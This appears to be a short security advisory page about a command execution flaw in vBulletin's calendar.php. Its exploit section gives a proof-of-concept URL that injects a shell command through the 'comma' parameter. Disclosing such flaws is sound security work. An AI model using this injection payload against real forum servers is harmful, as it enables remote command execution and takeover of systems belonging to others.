VBulletin Calendar.PHP Command Execution Vulnerability

info
discussion
exploit
solution
references

VBulletin Calendar.PHP Command Execution Vulnerability

The following proof of concept example has been made available:

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.